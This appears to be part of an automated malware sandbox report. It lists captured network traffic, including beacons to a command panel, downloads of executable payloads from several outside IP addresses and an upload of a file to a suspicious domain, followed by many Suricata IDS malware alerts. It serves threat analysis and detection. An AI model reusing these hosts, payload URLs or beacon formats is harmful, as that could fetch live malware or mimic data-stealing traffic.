2c 80 69 16 a6 9d 08 f5 5c dd e9 3d 49 2c 1f ac 7b 56 bf 76 28 25 18 c7 eb 91 66 43 f0 d1 03 6b 98 e7 18 b7 51 c7 d0 c7 d4 54 23 83 a5 f9 f4 f3 12 75 42 1a fe 65 e6 14 ba c5 e0 12 c6 95 66 37 47 d8 d0 23 94 ec 0f 09 8d 03 68 a8 ec 9c 60 41 81 aa 50 fe e1 1d 19 11 10 39 f7 96 05 7c 14 6e 98 c5 10 4c 01 13 25 21 5b 2a 82 ce b2 6d cd a4 b0 cb be 0d ef 04 0b 8b 18 be 21 92 d2 52 81 65 e6 2f e8 b8 26 1d f3 06 a8 b7 45 1e 01 c1 d2 cf 76 eb f6 b0 87 7c ea 1d 86 58 3b e5 98 03 37 d5 ed f5 74 6f dd 4a bd ef b2 4b ff bb c9 66 07 6f 74 73 e0 4b 83 d5 ba 6f e0 48 b1 14 0b 8e 74 a7 f3 23 8f 3d d6 d8 01 07 14 75 b6 cf 37 ca cc 31 49 80 65 7c 24 a3 ab 5e 0e e3 68 74 c4 6c c2 74 28 61 e6 eb b1 a4 eb e6 aa ca 33 b3 68 bc 32 a9 61 63 4c 7d e8 33 e5 85 e7 a1 5e 0f 98 5e 1d 57 0b 1c d3 83 cc 95 21 27 9d 38 c6 e6 ea 8d 8f 5d a9 1c 74 45 3b 98 1f 49 d0 74 56 5b 52 18 27 0c 73 d1 2b 08 29 dc d5 c1 7c 7e e1 fe 78 6b 19 cd ba 99 8f af aa d9 4b 9a 64 da c1 43 84 82 c9 52 76 3f f9 57 cb 09 a8 56 b1 3b 60 ef 3e cd f9 6d 0f 53 65 fb b4 4b 4d 58 84 44 8d 49 eb e8 05 1b 3b c8 c5 41 7f da 2b f2 ce ab b4 be b8 16 0a 2e 8e 22 05 76 95 da 53 40 d4 0d 13 a7 f8 13 91 87 26 30 13 c7 63 23 01 c9 81 de 35 11 b0 05 1e dc 95 38 65 d3 96 92 c1 61 c2 8b a1 93 fb 42 ef 7c 7c c0 2f 86 39 69 0d 43 c2 53 91 b6 05 8f 97 4d ad e8 30 d6 b7 71 dd 8a 3e fd 9c e0 e2 53 2d c7 5d 53 7f 29 74 80 d2 42 2a c1 10 b1 34
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017489001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5vt.topAccept: /Content-Length: 28693Content-Type: multipart/form-data; boundary=------------------------nRrMw9JTgeiHEQRbV11EgGData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 52 72 4d 77 39 4a 54 67 65 69 48 45 51 52 62 56 31 31 45 67 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 61 6c 69 77 65 67 65 6a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 78 87 17 37 f7 7f 5b d9 7e 06 22 b6 4c 3a 74 87 97 2e e7 96 a7 b5 fd d6 11 f3 8d 2b 6a 4c a8 8c 08 a4 c7 2a dd 79 63 a3 fc 49 b4 6d b3 fd e6 fb 47 f9 4f 89 a1 3a b3 67 45 c6 f3 f0 e2 e4 84 81 28 8d 3f 7d 30 01 26 fd 85 9a 01 b4 86 3c cf 8b e6 70 01 42 f4 a5 c7 c8 b8 64 fd c9 0d c8 b3 8d 0e dd ae e7 b4 67 6f db c5 35 9e 31 be 61 9d 24 10 bf 06 c1 13 51 c8 a7 c7 ee da 08 33 24 e4 e6 ac f3 9a e3 37 7a dd 7b 71 0d f1 5e 8b 8c de bf ca 53 e4 d0 19 47 14 81 1c 68 5a d6 13 98 e4 56 74 05 41 aa 24 e8 a0 32 03 7c d4 0a 81 31 65 f5 f0 08 f4 d8 85 c9 b7 80 3d 77 43 67 7b fb 1d 55 17 f1 1c cc 6d 64 d8 77 8e 5c b4 16 b3 5e 42 ee 89 c5 a8 61 e0 d1 28 55 37 65 67 f3 ea ce 9d cc 93 c2 93 9c 9e 4b 70 9f 62 b6 72 bf f7 be 6f 17 e7 e1 df 4b 75 cb d3 3f b0 29 23 30 35 9f c5 b3 04 26 01 21 ce b8 4c 30 93 68 a0 80 9d e2 1a a6 a8 83 3c 43 b0 80 ec df 31 2c 59 7c a9 f5 e1 aa 16 9f 28 1d a3 73 53 35 4f 2c dc bc cc b6 80 e0 71 a3 d6 42 d9 81 43 4c 54 06 3b 61 2c a9 94 0a 65 4a 82 29 4e da 4b ab 8f da 94 3d 11 9a 7a 75 cf 92 e3 4c c8 5f 27 d3 ef 69 85 8b c3 4d ad 09 c0 34 df 6d c2 f3 ab 34 eb 4f 4c 82 f6 00 4c 32 4e 81 a1 f3 be 8d d5 18 c8 d3 f9 db a4 7d bb 13 e8 b0 a2 bb 6a a6 57 e2 26 b8 bd ac e8 dd 23 6d 16 e8 1f cf ba 99 f5 23 d1 31 81 21 a5 47 3a ad 1f 8e 5d 93 f4 ad 9d fa 8d e5 91 03 0b 9e 26 96 c2 1e 18 af 32 fe 94 25 2b fa 7c 3c 27 0c 5d a8 22 bd 19 7d cb ba ec f8 83 a2 72 87 ff 67 d9 a5 f1 60 af 05 6c 99 72 96 9a 28 fd 08 94 34 49 24 41 b1 7e b5 15 a9 a6 cb c0 6b 4b 17 c5 9f de dc aa aa 55 02 17 9f 73 89 0e 91 5b 2e 43 37 e3 38 6e 0f 8c 32 c3 f7 8c 05 ab b8 09 a3 1b 82 7b 93 02 c2 e6 6a 2d b6 33 92 62 3f be ff 6c bd 15 98 fe 38 7c 30 8b 8a 10 08 da ce ce 04 45 12 9c ff 91 11 a3 b2 96 4b 3a 69 33 2a 7e fa cb 2b e1 61 a5 b9 63 2f 5c 0c 71 c9 4a b9 f9 a0 df c5 08 b8 77 5d bf 0a 4b 1b 8b a2 cb be a9 2f 8c bb 8a 49 30 b3 10 78 b5 78 b5 80 f4 cd e5 c8 90 31 48 f0 d1 87 8f df f6 72 1c 07 b4 b4 d2 c7 cb 22 54 8f d4 b7 2f 92 23 5c 37 ba 92 fb c2 3c 0e 0b 91 5a c0 e2 10 5e a1 46 f3 5b a6 f0 e3 2f 8a 4c 31 24 be 84 ca 5b 70 b6 87 c6 fb 20 a3 93 1d 96 75 ab 09 82 de 5e 3c 86 2f c6 36 d3 98 27 a2 0c 10 c7 ef 93 a4 66 4a 6b 50 a0 0c e9 32 12 d9 2d 95 d4 9e 27 bf a5 2a 4b 66 d9 ca 46 79 e7 af 73 8d 34 9c 5b cc f1 7b 2a e7 fa 80 74 cc 4c 96 65 43 d2 eb b1 dd 16 0b f4 b6 f3 5c 9c cb f1 a0 88 9c 79 07 d5 38 1a e4 1b
Source: global traffic	HTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: /Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 63 70 34 7a 39 53 42 43 6f 6d 30 6d 6a 62 41 79 31 37 33 34 35 39 39 34 39 33 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "cp4z9SBCom0mjbAy1734599493", "data": "Done2" }
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017490001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:27:33 GMTIf-None-Match: "6763d8f5-1b7e00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017491001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:27:44 GMTIf-None-Match: "6763d900-2cb000"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 2d 2d 0d 0a Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="build"stok------KJEGCFBGDHJJJJJKJECF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017492001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:25:38 GMTIf-None-Match: "6763d882-ec400"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017493001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:26:05 GMTIf-None-Match: "6763d89d-1a3200"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017494001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build"stok------AKKKFBGDHJKFHJJJJDGC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49860 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49878 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49881 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49908 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49910 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49916 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49928 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49967 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49974 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49946 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50024 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:50035 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50049 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50078 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50084 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50086 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50072 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:50087 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50097 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50094 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50117 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50126 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50091 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50135 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50136 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50140 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50141 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50144 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50148 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50147 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50160 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50171 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50161 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50178 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50180 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50184 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50181 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50188 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50185 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50191 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50197 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50205 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50192 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50186 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50213 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50216 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50251 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50256 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50260 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50142 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50152 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50262 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50268 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50269 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50267 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50272 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50274 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50309 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50307 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50313 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50324 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50317 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50321 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50349 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50318 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50350 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50379 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50381 -> 172.67.179.109:443
